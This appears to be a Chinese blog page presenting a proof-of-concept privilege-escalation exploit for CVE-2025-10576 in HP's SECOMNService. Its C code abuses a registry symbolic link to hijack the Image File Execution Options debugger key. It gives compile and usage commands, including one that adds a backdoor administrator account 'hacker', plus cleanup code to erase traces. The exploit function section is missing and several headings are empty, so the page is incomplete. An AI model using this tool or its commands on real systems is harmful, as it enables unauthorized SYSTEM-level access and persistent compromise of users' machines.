首页
看点啥
插画图片
首页 看点啥 HP Sound Research SECOMNService 权限提升漏洞利用工具

HP Sound Research SECOMNService 权限提升漏洞利用工具

2026-07-01 0

CVE-2025-10576:HP Sound Research SECOMNService 权限提升

项目概述

本项目是针对 CVE-2025-10576 漏洞的概念验证(PoC)利用工具。该漏洞影响 HP Sound Research 音频驱动组件的 SECOMNService 服务,由于注册表权限配置不当,允许任何非特权用户在 HKLMSoftwareSoundResearchAPO 路径下创建注册表符号链接,诱导 SECOMNService 服务在系统重启或服务重启时向攻击者控制的注册表路径写入任意内容,从而实现权限提升并执行任意系统命令。

HP Sound Research SECOMNService 权限提升漏洞利用工具

属性
漏洞编号CVE-2025-10576
影响组件HP Sound Research SECOMNService
漏洞类型权限提升 (EoP)
利用方式注册表符号链接 + Image File Execution Options
影响范围特定 HP 消费级/商用级设备

功能特性

安装指南

系统要求

编译步骤

使用 Visual Studio 命令行工具编译:

cl.exe /DUNICODE /D_UNICODE soundresearch_poc.c

使用 MinGW-w64 编译:

x86_64-w64-mingw32-gcc -o soundresearch_poc.exe soundresearch_poc.c -ladvapi32 -lntdll

依赖项

使用说明

基础用法

soundresearch_poc.exe [prepare|exploit|run|cleanup] [命令参数]

利用流程

第一步:准备(Prepare)

创建注册表符号链接,将 HKLMSoftwareSoundResearchAPO 重定向到 HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Optionswsqmcons.exe

soundresearch_poc.exe prepare

执行成功后,必须重启系统或重启 SECOMNService 服务才能使符号链接生效。

第二步:执行漏洞利用(Exploit)

设置 IFEO 调试器键值,将目标命令注入到 wsqmcons.exe 的调试器中:

soundresearch_poc.exe exploit "whoami /all > C:Windowssoundresearch.txt"

该命令会:

  1. 打开已符号链接的目标注册表路径
  2. 设置 Debugger 值为当前可执行文件路径 + run 子命令 + 目标命令
  3. 触发 CEIP Consolidator 计划任务
第三步:运行任意命令(Run)

直接通过工具执行任意命令(通常由 exploit 自动调用):

soundresearch_poc.exe run "net localgroup administrators"
第四步:清理(Cleanup)

删除所有创建的注册表项和符号链接:

soundresearch_poc.exe cleanup

使用场景示例

场景一:查看当前权限

soundresearch_poc.exe exploit "whoami"

场景二:添加管理员用户

soundresearch_poc.exe exploit "net user hacker P@ssw0rd /add && net localgroup administrators hacker /add"

场景三:获取系统信息

soundresearch_poc.exe exploit "systeminfo > C:tempsysinfo.txt"

核心代码

1. 注册表符号链接创建(Prepare)

BOOL prepare(void)
{
    wchar_t* linkstr = REGLINK_TARGET;  // 目标路径:IFEO
    HKEY hlink = NULL;    // 删除已存在的键,确保干净状态
    RegDeleteTreeW(HKEY_LOCAL_MACHINE, SOUNDRESEARCH_KEY);    // 创建注册表符号链接(REG_OPTION_CREATE_LINK 标志)
    if(!RegCreateKeyExW(HKEY_LOCAL_MACHINE, SOUNDRESEARCH_KEY, 0, NULL, 
                         REG_OPTION_CREATE_LINK, KEY_WRITE | KEY_READ, 
                         NULL, &hlink, NULL))
    {
        // 设置 SymbolicLinkValue 值指向目标路径
        RegSetValueExW(hlink, REG_SYMLINK_VALUE, 0, REG_LINK, 
                       (void*)linkstr, wcslen(linkstr) * sizeof(wchar_t));
        RegCloseKey(hlink);
        return TRUE;
    }
    return FALSE;
}

核心机制:使用 REG_OPTION_CREATE_LINK 配合 REG_LINK 值类型创建注册表符号链接。当服务以 SYSTEM 权限访问 SOUNDRESEARCH_KEY 时,实际会被重定向到 IFEO_KEY 路径。

3. 清理函数(Cleanup)

void cleanup(void)
{
    HKEY hlink = NULL;    // 打开符号链接并删除(使用 REG_OPTION_OPEN_LINK)
    if(!RegOpenKeyExW(HKEY_LOCAL_MACHINE, SOUNDRESEARCH_KEY, 
                       REG_OPTION_OPEN_LINK, DELETE, &hlink))
    {
        NtDeleteKey(hlink);  // 直接删除符号链接键
        RegCloseKey(hlink);
    }    // 删除 IFEO 键
    RegDeleteTreeW(HKEY_LOCAL_MACHINE, IFEO_KEY);
}

核心机制:使用 REG_OPTION_OPEN_LINK 打开符号链接本身而非目标路径,通过 NtDeleteKey 删除链接键,彻底清除痕迹。


4. 主控制逻辑(Main)

int main(int argc, char** argv)
{
    if(argc < 2) {
        printf("Usage: %s [prepare|exploit|run|cleanup] "{command line}"n", argv[0]);
        return 1;
    }
    
    if(!strcmp(argv[1], "cleanup")) {
        cleanup();
        return 0;
    }
    else if(!strcmp(argv[1], "prepare")) {
        if(!prepare()) {
            printf("Symlink creation failed!n");
            return 1;
        }
        printf("Symlink created! Now restart the machine or SECOMNService service!n");
        return 0;
    }
    else if(!strcmp(argv[1], "exploit")) {
        if(argc < 3) {
            printf("exploit requires an extra command line argument!n");
            return 1;
        }
        if(!exploit(argv[2])) {
            printf("Failed to run the exploit! Check permissions!n");
            return 1;
        }
        printf("Exploit successful! Queue command: "%s"n", argv[2]);
        return 0;
    }
    else if(!strcmp(argv[1], "run")) {
        if(argc < 3) {
            printf("run requires an extra command line argument!n");
            return 1;
        }
        run(argv[2]);
        return 0;
    }
    
    printf("Command "%s" not known. Use prepare, exploit, run or cleanup!n", argv[1]);
    return 1;
}

核心机制:命令行驱动的控制流程,支持 prepareexploitruncleanup 四个子命令,形成完整的漏洞利用闭环。

安全声明

参考链接

喜欢(0)

上一篇

图示 MongoDB 01|文档数据库

图示 MongoDB 01|文档数据库

下一篇

OpenSSL PKCS12 PBMAC1 堆栈缓冲区溢出漏洞 CVE-2025-11187 分析与验证

OpenSSL PKCS12 PBMAC1 堆栈缓冲区溢出漏洞 CVE-2025-11187 分析与验证
猜你喜欢